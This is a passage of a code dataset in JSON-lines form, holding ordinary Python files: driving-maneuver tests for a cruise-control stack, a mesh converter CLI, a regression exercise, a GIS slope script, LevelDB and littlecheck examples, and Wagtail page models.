speed_lead_breakpoints=[0., 6., 8., 12., 16., 20., 24.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"following a car at 10mph, stop and go at 1m/s2 lead dece1 and accel\",\n duration=70.,\n initial_speed=10.,\n lead_relevancy=True,\n initial_distance_lead=20.,\n speed_lead_values=[10., 0., 0., 10., 0., 10.],\n speed_lead_breakpoints=[10., 20., 30., 40., 50., 60.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"green light: stopped behind lead car, lead car accelerates at 1.5 m/s\",\n duration=30.,\n initial_speed=0.,\n lead_relevancy=True,\n initial_distance_lead=4.,\n speed_lead_values=[0, 0, 45],\n speed_lead_breakpoints=[0, 10., 40.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7),\n (CB.RES_ACCEL, 1.8), (0.0, 1.9),\n (CB.RES_ACCEL, 2.0), (0.0, 2.1),\n (CB.RES_ACCEL, 2.2), (0.0, 2.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"stop and go with 1m/s2 lead decel and accel, with full stops\",\n duration=70.,\n initial_speed=0.,\n lead_relevancy=True,\n initial_distance_lead=20.,\n speed_lead_values=[10., 0., 0., 10., 0., 0.],\n speed_lead_breakpoints=[10., 20., 30., 40., 50., 60.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"stop and go with 1.5m/s2 lead accel and 3.3m/s^2 lead decel, with full stops\",\n duration=45.,\n initial_speed=0.,\n lead_relevancy=True,\n initial_distance_lead=20.,\n speed_lead_values=[10., 0., 0., 10., 0., 0.],\n speed_lead_breakpoints=[10., 13., 26., 33., 36., 45.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"accelerate from 20 while lead vehicle decelerates from 40 to 20 at 1m/s2\",\n duration=30.,\n initial_speed=10.,\n lead_relevancy=True,\n initial_distance_lead=10.,\n speed_lead_values=[20., 10.],\n speed_lead_breakpoints=[1., 11.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7),\n (CB.RES_ACCEL, 1.8), (0.0, 1.9),\n (CB.RES_ACCEL, 2.0), (0.0, 2.1),\n (CB.RES_ACCEL, 2.2), (0.0, 2.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"accelerate from 20 while lead vehicle decelerates from 40 to 0 at 2m/s2\",\n duration=30.,\n initial_speed=10.,\n lead_relevancy=True,\n initial_distance_lead=10.,\n speed_lead_values=[20., 0.],\n speed_lead_breakpoints=[1., 11.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7),\n (CB.RES_ACCEL, 1.8), (0.0, 1.9),\n (CB.RES_ACCEL, 2.0), (0.0, 2.1),\n (CB.RES_ACCEL, 2.2), (0.0, 2.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"fcw: traveling at 30 m/s and approaching lead traveling at 20m/s\",\n duration=15.,\n initial_speed=30.,\n lead_relevancy=True,\n initial_distance_lead=100.,\n speed_lead_values=[20.],\n speed_lead_breakpoints=[1.],\n cruise_button_presses=[],\n checks=[check_fcw],\n ),\n Maneuver(\n \"fcw: traveling at 20 m/s following a lead 
that decels from 20m/s to 0 at 1m/s2\",\n duration=18.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 0.],\n speed_lead_breakpoints=[3., 23.],\n cruise_button_presses=[],\n checks=[check_fcw],\n ),\n Maneuver(\n \"fcw: traveling at 20 m/s following a lead that decels from 20m/s to 0 at 3m/s2\",\n duration=13.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 0.],\n speed_lead_breakpoints=[3., 9.6],\n cruise_button_presses=[],\n checks=[check_fcw],\n ),\n Maneuver(\n \"fcw: traveling at 20 m/s following a lead that decels from 20m/s to 0 at 5m/s2\",\n duration=8.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 0.],\n speed_lead_breakpoints=[3., 7.],\n cruise_button_presses=[],\n checks=[check_fcw],\n )\n]\n\n\ndef setup_output():\n output_dir = os.path.join(os.getcwd(), 'out/longitudinal')\n if not os.path.exists(os.path.join(output_dir, \"index.html\")):\n # write test output header\n\n css_style = \"\"\"\n .maneuver_title {\n font-size: 24px;\n text-align: center;\n }\n .maneuver_graph {\n width: 100%;\n }\n \"\"\"\n\n view_html = \"\" % (css_style,)\n for i, man in enumerate(maneuvers):\n view_html += \"\" % (man.title,)\n for c in ['distance.svg', 'speeds.svg', 'acceleration.svg', 'pedals.svg', 'pid.svg']:\n view_html += \"\" % (os.path.join(\"maneuver\" + str(i + 1).zfill(2), c), )\n view_html += \"\"\n\n mkdirs_exists_ok(output_dir)\n with open(os.path.join(output_dir, \"index.html\"), \"w\") as f:\n f.write(view_html)\n\n\nclass LongitudinalControl(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n os.environ['SIMULATION'] = \"1\"\n os.environ['SKIP_FW_QUERY'] = \"1\"\n os.environ['NO_CAN_TIMEOUT'] = \"1\"\n\n setup_output()\n\n params = Params()\n params.clear_all()\n params.put_bool(\"Passive\", bool(os.getenv(\"PASSIVE\")))\n params.put_bool(\"OpenpilotEnabledToggle\", True)\n params.put_bool(\"CommunityFeaturesToggle\", True)\n\n # hack\n def test_longitudinal_setup(self):\n pass\n\n\ndef run_maneuver_worker(k):\n man = maneuvers[k]\n output_dir = os.path.join(os.getcwd(), 'out/longitudinal')\n\n def run(self):\n print(man.title)\n valid = False\n\n for _ in range(3):\n managed_processes['radard'].start()\n managed_processes['controlsd'].start()\n managed_processes['plannerd'].start()\n\n plot, valid = man.evaluate()\n plot.write_plot(output_dir, \"maneuver\" + str(k + 1).zfill(2))\n\n managed_processes['radard'].stop()\n managed_processes['controlsd'].stop()\n managed_processes['plannerd'].stop()\n\n if valid:\n break\n\n self.assertTrue(valid)\n\n return run\n\n\nfor k in range(len(maneuvers)):\n setattr(LongitudinalControl, \"test_longitudinal_maneuvers_%d\" % (k + 1), run_maneuver_worker(k))\n\nif __name__ == \"__main__\":\n unittest.main(failfast=True)\n"} {"ext": "py", "sha": "1a2edd21b8b9d28d0c8c69efd0ead187dc60aed9", "content": "# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import Column, ForeignKey, Integer, Text\n\nfrom pokr.database import Base\n\n\nclass MeetingAttendee(Base):\n __tablename__ = 'meeting_attendee'\n\n id = Column(Integer, autoincrement=True, primary_key=True)\n meeting_id = Column(ForeignKey('meeting.id'), nullable=False, index=True)\n person_id = Column(ForeignKey('person.id'), nullable=False, index=True)\n\n"} {"ext": "py", "sha": "1a2edd30755631a304b9ffae0330b4db1f1274e8", "content": "import numpy as np\n\nfrom .._helpers import _writer_map, read, reader_map, write\n\n\ndef 
add_args(parser):\n parser.add_argument(\"infile\", type=str, help=\"mesh file to be read from\")\n parser.add_argument(\n \"--input-format\",\n \"-i\",\n type=str,\n choices=sorted(list(reader_map.keys())),\n help=\"input file format\",\n default=None,\n )\n parser.add_argument(\n \"--output-format\",\n \"-o\",\n type=str,\n choices=sorted(list(_writer_map.keys())),\n help=\"output file format\",\n default=None,\n )\n parser.add_argument(\n \"--ascii\",\n \"-a\",\n action=\"store_true\",\n help=\"write in ASCII format variant (where applicable, default: binary)\",\n )\n parser.add_argument(\"outfile\", type=str, help=\"mesh file to be written to\")\n parser.add_argument(\n \"--float-format\",\n \"-f\",\n type=str,\n help=\"float format used in output ASCII files (default: .16e)\",\n )\n parser.add_argument(\n \"--sets-to-int-data\",\n \"-s\",\n action=\"store_true\",\n help=\"if possible, convert sets to integer data (useful if the output type does not support sets)\",\n )\n parser.add_argument(\n \"--int-data-to-sets\",\n \"-d\",\n action=\"store_true\",\n help=\"if possible, convert integer data to sets (useful if the output type does not support integer data)\",\n )\n\n\ndef convert(args):\n # read mesh data\n mesh = read(args.infile, file_format=args.input_format)\n\n # Some converters (like VTK) require `points` to be contiguous.\n mesh.points = np.ascontiguousarray(mesh.points)\n\n if args.sets_to_int_data:\n mesh.point_sets_to_data()\n mesh.cell_sets_to_data()\n\n if args.int_data_to_sets:\n for key in mesh.point_data:\n mesh.point_data_to_sets(key)\n for key in mesh.cell_data:\n mesh.cell_data_to_sets(key)\n\n # write it out\n kwargs = {\"file_format\": args.output_format}\n if args.float_format is not None:\n kwargs[\"float_fmt\"] = args.float_format\n if args.ascii:\n kwargs[\"binary\"] = False\n\n write(args.outfile, mesh, **kwargs)\n"} {"ext": "py", "sha": "1a2ede8ccc24684c26563373e68bc1984c47623a", "content": "from sklearn.datasets import load_boston\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_val_predict, cross_val_score\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# load the data set we'll be working with. 
In this case the Boston housing\nboston = load_boston()\nboston_df = pd.DataFrame(data=boston.data, columns=boston.feature_names) # get it into a pandas data frame\ny = pd.DataFrame(data=boston.target) # median home value (MEDV) is the regression target\nX = boston_df[['LSTAT', 'AGE']]\n# boston_df.describe() # take a look at the data\nboston = None # help garbage collector\n\n# Task 2) make a linear regression model with LSTAT+AGE to predict median value\nlr1 = LinearRegression() # create the object\nlr1.fit(X, y)\n\n# cross_val_predict returns an array of the same size as `y` where each entry\n# is a prediction obtained by cross validation:\npredicted = cross_val_predict(lr1, X, y, cv=10)\nscores = cross_val_score(lr1, X, y, cv=10)\nprint(\"R^2: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\nfig, ax = plt.subplots()\nax.scatter(y, predicted, edgecolors=(0, 0, 0)) # predicted values\nax.plot([y.min(), y.max()], [y.min(), y.max()], 'k--', lw=4) # regression line\nax.set_xlabel('Measured')\nax.set_ylabel('Predicted')\n# show the graph\nplt.show()\n"} {"ext": "py", "sha": "1a2edeb41300d9909b9d2b82d2967da99d2b7ad2", "content": "###########################################################################\r\n### Estimation of Slope along the boundary using the buffer distance ###\r\n### Author : Lakshmi E ###\r\n### Last Edit: 13-April-2020 ###\r\n###########################################################################\r\n\r\nimport arcpy\r\nimport os,glob\r\nimport numpy as np\r\nfrom arcpy.sa import *\r\nfrom arcpy import env\r\nimport dbf\r\nimport csv\r\n\r\n# work in the current directory\r\nenv.workspace=(input(\"give the current directory:\")) #'C:\Users\Laks\Desktop\REGSim module'\r\ndirpath = os.getcwd()\r\n\r\n#assign the buffer distance \r\nbuffer_dist = input('Buffer distance between the study area (meters):')\r\nnum_pts = input('no.
of points considered across the boundary:')\r\n\r\n# Load required toolboxes\r\narcpy.ImportToolbox(\".\\Module\\CreatePointsLines.tbx\")\r\narcpy.CheckOutExtension(\"spatial\")\r\n\r\n# create buffer in and out\r\ndef buffer(bound):\r\n print('Creating buffer inside and outside the boundary area...')\r\n arcpy.Buffer_analysis(bound, 'buffin{0}.shp'.format(buffer_dist),'-{0}'.format(buffer_dist),'FULL','ROUND','NONE','')\r\n arcpy.Buffer_analysis(bound, 'bufout{0}.shp'.format(buffer_dist),'{0}'.format(buffer_dist),'FULL','ROUND','NONE','')\r\n\r\nbound='bound_hmda.shp' \r\n\r\nbuffer(bound)\r\n\r\n# create points to the feature class\r\nprint('Converting polygon to line feature class...')\r\n\r\ndef ext_pts(bound,boundin,boundout,bufin,bufout):\r\n list=[bound,boundin,boundout,bufin,bufout] \r\n for i in list:\r\n print(i)\r\n arcpy.FeatureToLine_management(i,'{0}_line.shp'.format(i[:-4]),'','ATTRIBUTES')\r\n arcpy.AddField_management('{0}_line.shp'.format(i[:-4]),'Length','FLOAT','','','','','NULLABLE','NON_REQUIRED',\"\")\r\n arcpy.CalculateField_management('{0}_line.shp'.format(i[:-4]), \"Length\", \"!SHAPE.Length!\", \"PYTHON\", \"\")\r\n length = arcpy.da.SearchCursor('{0}_line.shp'.format(i[:-4]), \"Length\").next()[0]\r\n dist_intv = length/num_pts #point_num\r\n arcpy.CreatePointsLines_CreatePointsLines('{0}_line.shp'.format(i[:-4]),'INTERVAL BY DISTANCE', 'BEGINNING','NO','',dist_intv,'NO','{0}_pts.shp'.format(i[:-4]))\r\n\r\nprint('Created points to the feature class...')\r\nbound = 'bound_hmda.shp'\r\nboundin = 'bndin_hmda.shp'\r\nboundout = 'bndou_hmda.shp'\r\nbufin = 'buffin{0}.shp'.format(buffer_dist)\r\nbufout = 'bufout{0}.shp'.format(buffer_dist)\r\n\r\next_pts(bound,boundin,boundout,bufin,bufout)\r\n \r\n# extract elevation value to the points\r\nprint('Extracting the elevation data from the raster to the point featureclass...')\r\n\r\ndef pts_value(raster,list): \r\n for i in raster:\r\n print(i)\r\n ExtractValuesToPoints('bound_hmda_pts.shp','{0}'.format(i),'bound{1}_{0}_extrpts{2}_{3}.shp'.format(i[9:12],buffer_dist,num_pts,i[2:4]),'INTERPOLATE','VALUE_ONLY')\r\n arcpy.AddField_management('bound{1}_{0}_extrpts{2}_{3}.shp'.format(i[9:12],buffer_dist,num_pts,i[2:4]),\"Slope\",\"DOUBLE\",\"\", \"\", \"\", \"\", \"NULLABLE\", \"NON_REQUIRED\", \"\")\r\n for j,z in zip(list,list_bound):\r\n print(j)\r\n print(z)\r\n ExtractValuesToPoints('{0}_pts.shp'.format(j[:-4]),'{0}'.format(i),'{0}_{1}_extrpts.shp'.format(j[0:5],i[9:12]),'INTERPOLATE','VALUE_ONLY')\r\n ExtractValuesToPoints('{0}_pts.shp'.format(z[:-4]),'{0}'.format(i),'{0}_{1}_extrpts.shp'.format(z[0:5],i[9:12]),'INTERPOLATE','VALUE_ONLY')\r\n for k,l in zip(list_bound,list):\r\n arcpy.Near_analysis('{0}_{1}_extrpts.shp'.format(k[0:5],i[9:12]),'{0}_{1}_extrpts.shp'.format(l[0:5],i[9:12]),'','NO_LOCATION','NO_ANGLE')\r\n arcpy.JoinField_management('{0}_{1}_extrpts.shp'.format(k[0:5],i[9:12]),'NEAR_FID','{0}_{1}_extrpts.shp'.format(l[0:5],i[9:12]),\"FID\",\"#\")\r\n arcpy.AddField_management('{0}_{1}_extrpts.shp'.format(k[0:5],i[9:12]), \"Slope\", \"FLOAT\", \"\", \"\", \"\", \"\", \"NULLABLE\", \"NON_REQUIRED\", \"\")\r\n arcpy.AddField_management('{0}_{1}_extrpts.shp'.format(l[0:5],i[9:12]), \"Slope\", \"FLOAT\", \"\", \"\", \"\", \"\", \"NULLABLE\", \"NON_REQUIRED\", \"\")\r\n arcpy.CalculateField_management('bndou_{0}_extrpts.shp'.format(i[9:12]), \"Slope\", \"(!RASTERVALU!- !RASTERVA_1!) 
/ !NEAR_DIST!\", \"PYTHON_9.3\", \"\")\r\n arcpy.CalculateField_management('bndin_{0}_extrpts.shp'.format(i[9:12]), \"Slope\", \"(!RASTERVA_1!-!RASTERVALU!) / !NEAR_DIST!\", \"PYTHON_9.3\", \"\")\r\n \r\n \r\nraster=sorted(glob.glob(\"*_GWL_*.tif\"))\r\nlist=['buffin{0}.shp'.format(buffer_dist),'bufout{0}.shp'.format(buffer_dist)]\r\nlist_bound = ['bndin_hmda.shp','bndou_hmda.shp']\r\n\r\npts_value(raster,list) \r\n\r\n# estimae the average slope\r\nprint('Estimating slope in each point of the boundary area...') \r\nfilesav = []\r\ndef avg_sl(raster): \r\n for i in raster:\r\n list=sorted(glob.glob('bnd*{0}_extrpts.dbf'.format(i[9:12])))\r\n print(list)\r\n tabin=dbf.Table('{0}'.format(list[0]))\r\n tabin.open()\r\n tabout=dbf.Table('{0}'.format(list[1]))\r\n tabout.open()\r\n tabbou=dbf.Table('bound{1}_{0}_extrpts{2}_{3}.dbf'.format(i[9:12],buffer_dist,num_pts,i[2:4]))\r\n tabbou.open(mode=dbf.READ_WRITE)\r\n \r\n for l,j,k in zip(tabin,tabout,range(0,len(tabbou))):\r\n mas=l[-1]\r\n sla=j[-1]\r\n res=((mas+sla)/2) \r\n with tabbou[k] as record:\r\n record.slope=res\r\n\r\n tabin.close()\r\n tabout.close()\r\n tabbou.close()\r\n print(tabbou)\r\n \r\n f = 'bound{1}_{0}_extrpts{2}_{3}'.format(i[9:12],buffer_dist,num_pts,i[2:4])\r\n filesav.append(f)\r\n \r\nraster=sorted(glob.glob(\"*_GWL_*.tif\"))\r\n\r\navg_sl(raster)\r\n\r\nprint(' Saving the output file')\r\nwith open('output.csv', 'wb') as output:\r\n csvwriter = csv.writer(output,dialect='excel')\r\n for row in filesav:\r\n csvwriter.writerow([row])\r\n output.close()\r\n\r\n#end of the script\r\n\r\n\r\n\r\n\r\n"} {"ext": "py", "sha": "1a2edef61dc501658997a39df402d79fc3b3143b", "content": "import leveldb\n\ndb = leveldb.LevelDB('./db')\n\n# single put\ndb.Put(b'hello', b'hello world')\nprint(db.Get(b'hello').decode('utf-8'))\n\n# multiple put/delete applied atomically, and committed to disk\nbatch = leveldb.WriteBatch()\nbatch.Put(b'hello', b'world')\nbatch.Put(b'hello again', b'world')\nbatch.Delete(b'hello')\n\ndb.Write(batch, sync = True)\n"} {"ext": "py", "sha": "1a2edfe6d1928a9d30ef2f2af1ae52daeae8cdd7", "content": "import unittest\nimport io\nimport os.path\nimport tempfile\n\nimport littlecheck\n\n\nclass LittlecheckTest(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n \"\"\" Switch to test/files directory. \"\"\"\n test_dir = os.path.dirname(os.path.abspath(__file__))\n os.chdir(os.path.join(test_dir, \"files\"))\n\n def do_1_path_test(self, name, skip=False):\n \"\"\" Run a single test. 
The name is the test name.\n The input file is the name with .py extension, the expected\n output of littlecheck is the name with .expected extension.\n \"\"\"\n test_path = name + \".py\" if not \".\" in name else name\n expected_output_path = name + \".expected\"\n subs = {\"%\": \"%\", \"s\": test_path}\n conf = littlecheck.Config()\n failures = []\n success = littlecheck.check_path(test_path, subs, conf, failures.append)\n failures_message = \"\\n\".join([f.message() for f in failures]).strip()\n with io.open(expected_output_path, \"r\", encoding=\"utf-8\") as fd:\n expect_text = fd.read().strip()\n expect_success = not expect_text\n self.assertEqual(failures_message, expect_text)\n if skip:\n self.assertEqual(success, littlecheck.SKIP)\n else:\n self.assertEqual(success, expect_success)\n\n def test_py_ok(self):\n self.do_1_path_test(\"python_ok\")\n\n def test_py_err1(self):\n self.do_1_path_test(\"python_err1\")\n\n def test_py_middle_error(self):\n self.do_1_path_test(\"python_middle_error\")\n\n def test_py_missing_output(self):\n self.do_1_path_test(\"python_missing_output\")\n\n def test_py_multiple_errour_output(self):\n self.do_1_path_test(\"python_multipe_error_annotation_lines\")\n\n def test_py_extra_output(self):\n self.do_1_path_test(\"python_extra_output\")\n\n def test_py_out_vs_err(self):\n self.do_1_path_test(\"python_out_vs_err\")\n\n def test_py_path(self):\n self.do_1_path_test(\"python_path_cmd\")\n\n def test_py_shebang(self):\n self.do_1_path_test(\"python_shebang\")\n\n def test_py_color(self):\n self.do_1_path_test(\"python_color\")\n\n def test_inline_check(self):\n self.do_1_path_test(\"inline-check\")\n\n def test_py_whitespace(self):\n self.do_1_path_test(\"python_whitespace\")\n\n def test_py_replace(self):\n self.do_1_path_test(\"python_doublereplace\")\n\n def test_skip(self):\n self.do_1_path_test(\"skip\", skip=True)\n\n def test_require_succeeds(self):\n self.do_1_path_test(\"no_skip\", skip=False)\n\n def test_require_succeeds(self):\n self.do_1_path_test(\"no_skip\", skip=False)\n\n def test_exe_found(self):\n self.do_1_path_test(\"exe_found\")\n\n def test_exe_not_found(self):\n try:\n self.do_1_path_test(\"exe_not_found\")\n except littlecheck.CheckerError:\n return True\n raise Error\n"} {"ext": "py", "sha": "1a2ee250cabe087344af5c065384497ec20f9b02", "content": "from __future__ import absolute_import, unicode_literals\n\nfrom datetime import date\n\nfrom django.db import models\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom modelcluster.fields import ParentalKey\nfrom taggit.models import TaggedItemBase\n\nfrom wagtail.utils.pagination import paginate\nfrom wagtail.wagtailadmin.edit_handlers import (\n FieldPanel, InlinePanel, MultiFieldPanel, PageChooserPanel)\nfrom wagtail.wagtailcore.fields import RichTextField\nfrom wagtail.wagtailcore.models import Orderable, Page\nfrom wagtail.wagtaildocs.edit_handlers import DocumentChooserPanel\nfrom wagtail.wagtailimages.edit_handlers import ImageChooserPanel\nfrom wagtail.wagtailsearch import index\n\n\n# ABSTRACT MODELS\n# =============================\n\nclass AbstractLinkFields(models.Model):\n link_external = models.URLField(\"External link\", blank=True)\n link_page = models.ForeignKey(\n 'wagtailcore.Page',\n null=True,\n blank=True,\n related_name='+',\n on_delete=models.CASCADE\n )\n link_document = models.ForeignKey(\n 'wagtaildocs.Document',\n null=True,\n blank=True,\n related_name='+',\n on_delete=models.CASCADE\n )\n\n @property\n def link(self):\n if 
self.link_page:\n return self.link_page.url\n elif self.link_document:\n return self.link_document.url\n else:\n return self.link_external\n\n api_fields = ('link', )\n\n panels = [\n FieldPanel('link_external'),\n PageChooserPanel('link_page'),\n DocumentChooserPanel('link_document'),\n ]\n\n class Meta:\n abstract = True\n\n\nclass AbstractRelatedLink(AbstractLinkFields):\n title = models.CharField(max_length=255, help_text=\"Link title\")\n\n api_fields = ('title', ) + AbstractLinkFields.api_fields\n\n panels = [\n FieldPanel('title'),\n MultiFieldPanel(AbstractLinkFields.panels, \"Link\"),\n ]\n\n class Meta:\n abstract = True\n\n\nclass AbstractCarouselItem(AbstractLinkFields):\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n embed_url = models.URLField(\"Embed URL\", blank=True)\n caption = models.CharField(max_length=255, blank=True)\n\n api_fields = (\n 'image',\n 'embed_url',\n 'caption',\n ) + AbstractLinkFields.api_fields\n\n panels = [\n ImageChooserPanel('image'),\n FieldPanel('embed_url'),\n FieldPanel('caption'),\n MultiFieldPanel(AbstractLinkFields.panels, \"Link\"),\n ]\n\n class Meta:\n abstract = True\n\n\nclass ContactFieldsMixin(models.Model):\n telephone = models.CharField(max_length=20, blank=True)\n email = models.EmailField(blank=True)\n address_1 = models.CharField(max_length=255, blank=True)\n address_2 = models.CharField(max_length=255, blank=True)\n city = models.CharField(max_length=255, blank=True)\n country = models.CharField(max_length=255, blank=True)\n post_code = models.CharField(max_length=10, blank=True)\n\n api_fields = (\n 'telephone',\n 'email',\n 'address_1',\n 'address_2',\n 'city',\n 'country',\n 'post_code',\n )\n\n panels = [\n FieldPanel('telephone'),\n FieldPanel('email'),\n FieldPanel('address_1'),\n FieldPanel('address_2'),\n FieldPanel('city'),\n FieldPanel('country'),\n FieldPanel('post_code'),\n ]\n\n class Meta:\n abstract = True\n\n\n# PAGE MODELS\n# =============================\n\n# Home page\n\nclass HomePage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n body = RichTextField(blank=True)\n\n api_fields = (\n 'body',\n 'carousel_items',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('body'),\n ]\n\n class Meta:\n verbose_name = \"homepage\"\n\n\nclass HomePageCarouselItem(Orderable, AbstractCarouselItem):\n page = ParentalKey('HomePage', related_name='carousel_items', on_delete=models.CASCADE)\n\n\nclass HomePageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('HomePage', related_name='related_links', on_delete=models.CASCADE)\n\n\nHomePage.content_panels = Page.content_panels + [\n FieldPanel('body', classname=\"full\"),\n\n InlinePanel('carousel_items', label=\"Carousel items\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\n# Standard pages\n\nclass StandardPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n intro = RichTextField(blank=True)\n body = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'intro',\n 'body',\n 'feed_image',\n 'carousel_items',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n index.SearchField('body'),\n ]\n\n\nclass 
StandardPageCarouselItem(Orderable, AbstractCarouselItem):\n page = ParentalKey('StandardPage', related_name='carousel_items', on_delete=models.CASCADE)\n\n\nclass StandardPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('StandardPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nStandardPage.content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n FieldPanel('body', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nStandardPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\nclass StandardIndexPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n intro = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'intro',\n 'feed_image',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n ]\n\n\nclass StandardIndexPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('StandardIndexPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nStandardIndexPage.content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nStandardIndexPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\n# Blog pages\n\nclass BlogEntryPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n body = RichTextField()\n tags = ClusterTaggableManager(through='BlogEntryPageTag', blank=True)\n date = models.DateField(\"Post date\")\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'body',\n 'tags',\n 'date',\n 'feed_image',\n 'carousel_items',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('body'),\n ]\n\n def get_blog_index(self):\n # Find closest ancestor which is a blog index\n return BlogIndexPage.ancestor_of(self).last()\n\n\nclass BlogEntryPageCarouselItem(Orderable, AbstractCarouselItem):\n page = ParentalKey('BlogEntryPage', related_name='carousel_items', on_delete=models.CASCADE)\n\n\nclass BlogEntryPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('BlogEntryPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nclass BlogEntryPageTag(TaggedItemBase):\n content_object = ParentalKey('BlogEntryPage', related_name='tagged_items', on_delete=models.CASCADE)\n\n\nBlogEntryPage.content_panels = Page.content_panels + [\n FieldPanel('date'),\n FieldPanel('body', classname=\"full\"),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nBlogEntryPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n FieldPanel('tags'),\n]\n\n\nclass BlogIndexPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n intro = RichTextField(blank=True)\n\n api_fields = (\n 'intro',\n 'related_links',\n )\n\n search_fields = 
Page.search_fields + [\n index.SearchField('intro'),\n ]\n\n def get_blog_entries(self):\n # Get list of live blog pages that are descendants of this page\n entries = BlogEntryPage.objects.descendant_of(self).live()\n\n # Order by most recent date first\n entries = entries.order_by('-date')\n\n return entries\n\n def get_context(self, request):\n # Get blog entries\n entries = self.get_blog_entries()\n\n # Filter by tag\n tag = request.GET.get('tag')\n if tag:\n entries = entries.filter(tags__name=tag)\n\n paginator, entries = paginate(request, entries, page_key='page', per_page=10)\n\n # Update template context\n context = super(BlogIndexPage, self).get_context(request)\n context['entries'] = entries\n return context\n\n\nclass BlogIndexPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('BlogIndexPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nBlogIndexPage.content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\n# Events pages\n\nclass EventPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n AUDIENCE_CHOICES = (\n ('public', \"Public\"),\n ('private', \"Private\"),\n )\n\n date_from = models.DateField(\"Start date\")\n date_to = models.DateField(\n \"End date\",\n 